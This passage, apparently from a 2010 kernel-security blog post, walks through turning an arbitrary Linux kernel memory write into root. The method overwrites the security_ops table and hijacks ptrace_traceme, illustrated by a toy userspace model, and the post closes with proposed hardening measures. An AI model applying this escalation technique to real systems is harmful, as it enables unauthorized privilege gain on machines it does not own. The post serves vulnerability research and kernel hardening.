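static struct ioctl_fields decode_ioctl(uint32_t cmd)
{
        struct ioctl_fields f;

        f.nr = cmd & 0xff;
        f.type = (char)((cmd >> 8) & 0xff);
        f.size = (cmd >> 16) & 0x3fff;
        f.dir = (cmd >> 30) & 0x3;
        return f;
}
```

Under that assumption, decode_ioctl(0x4020761b) gives a write-direction ioctl of type 'v', number 27, with a 32-byte argument.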

Since the ioctl already does a multi-byte copy, we can now copy arbitrary lengths of bytes into kernel memory. One method of turning an arbitrary kernel memory write into a privilege escalation is to overwrite a kernel function pointer, and trigger that function. Based on the exploit for CVE-2010-3081, I opted to overwrite the security_ops function pointer table. Their use of msg_queue_msgctl wasn’t very good for the general case since it’s near the end of the table and its offset would depend on kernel versions. Initially I opted for getcap, but in the end used ptrace_traceme, both of which are very near the top of the security_ops structure. (Though I need to share credit here with Dan Rosenberg as we were working together on improving the reliability of the security_ops overwrite method. He used the same approach for his excellent RDS exploit.)

Here are the steps for one way of taking an arbitrary kernel memory write and turning it into a root escalation:

  • overwrite security_ops with default_security_ops, which will revert the LSM back to the capabilities-only security operations. This also means we can calculate where cap_ptrace_traceme is.
  • overwrite default_security_ops->ptrace_traceme to point to our supplied function that will actually perform the privilege escalation (thanks to Brad Spengler for his code from Enlightenment).
  • trigger the function (in this case, call ptrace(PTRACE_TRACEME, 0, NULL, NULL)).
  • restore default_security_ops->ptrace_traceme to point to cap_ptrace_traceme so the next caller doesn’t Oops the system (since userspace memory will be remapped).
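The order of those four steps can be modeled in an ordinary userspace program. This is only a toy sketch: every name is hypothetical, the table is not the kernel's security_ops, and the plain assignments stand in for what the exploit has to do through the arbitrary write.

```c
#include <stddef.h>

/* Hypothetical one-entry ops table standing in for security_ops. */
struct toy_ops {
        int (*traceme)(void);
};

static int toy_cap_traceme(void) { return 0; }   /* default handler */
static int toy_lsm_traceme(void) { return -1; }  /* stricter module handler */

static int toy_payload_ran;
static int toy_payload(void)                      /* stand-in for the supplied function */
{
        toy_payload_ran = 1;
        return 0;
}

static struct toy_ops toy_default_ops = { toy_cap_traceme };
static struct toy_ops toy_lsm_ops = { toy_lsm_traceme };
static struct toy_ops *toy_active_ops = &toy_lsm_ops;

static int toy_run_steps(void)
{
        int ret;

        /* 1: point the active table back at the default operations */
        toy_active_ops = &toy_default_ops;
        /* 2: replace one entry in the default table */
        toy_default_ops.traceme = toy_payload;
        /* 3: trigger the replaced entry through the normal call path */
        ret = toy_active_ops->traceme();
        /* 4: restore the entry so later callers get the real handler */
        toy_default_ops.traceme = toy_cap_traceme;
        return ret;
}
```

Step 4 matters as much as step 3 in the model: once the table is restored, later calls through toy_active_ops reach toy_cap_traceme again.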

Here’s the source for Vyakarana as seen running in Enlightenment using cap_getcap (which is pretty unstable, so you might want to switch it to use ptrace_traceme), and as a stand-alone memory writer.

Conclusions: Keep auditing the kernel for more arbitrary writes; I think there are still many left. Reduce the exploitation surface within the kernel itself (which PaX and grsecurity have been doing for a while now), specifically:

  • Block userspace memory access while in kernel mode. This would stop the ability to make the kernel start executing functions that live in userspace — a clear privilege violation. This protection would stop the current exploit above, but the exploit could be adjusted to use kernel memory instead.
  • Keep function pointers read-only. There is no reason for these function pointer tables (fops, IDT, security_ops, etc) to be writable. These should all be marked correctly, with inline code exceptions being made for updating the global pointers to those tables, leaving the pointer read-only after it gets set. This would stop this particular exploit above, but there are still plenty more targets.
  • Randomize the kernel stack location on a per-syscall basis. This will stop exploits that depend on a stable kernel stack location (as this exploit does).
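As a rough illustration of the read-only function pointer idea, here is a userspace sketch with a const ops table. The names are hypothetical. In a typical toolchain a static const object like this ends up in a read-only section, but that placement is an assumption about the compiler and linker, not something the C language guarantees, and it is not the kernel's actual mechanism.

```c
/* Hypothetical ops table; real kernel tables have many more entries. */
struct ro_ops {
        int (*open)(void);
};

static int ro_open(void)
{
        return 42;
}

/* const table: assigning to ro_table.open later is a compile error,
 * and the object is typically placed in read-only memory. */
static const struct ro_ops ro_table = { .open = ro_open };

/* The pointer to the table is const as well, so it cannot be
 * redirected after it is set here. */
static const struct ro_ops *const ro_current = &ro_table;

static int ro_call_open(void)
{
        return ro_current->open();
}
```

The point of the design is that both the table and the global pointer to it are fixed after initialization, so a stray write has one less kind of target.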

© 2010, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
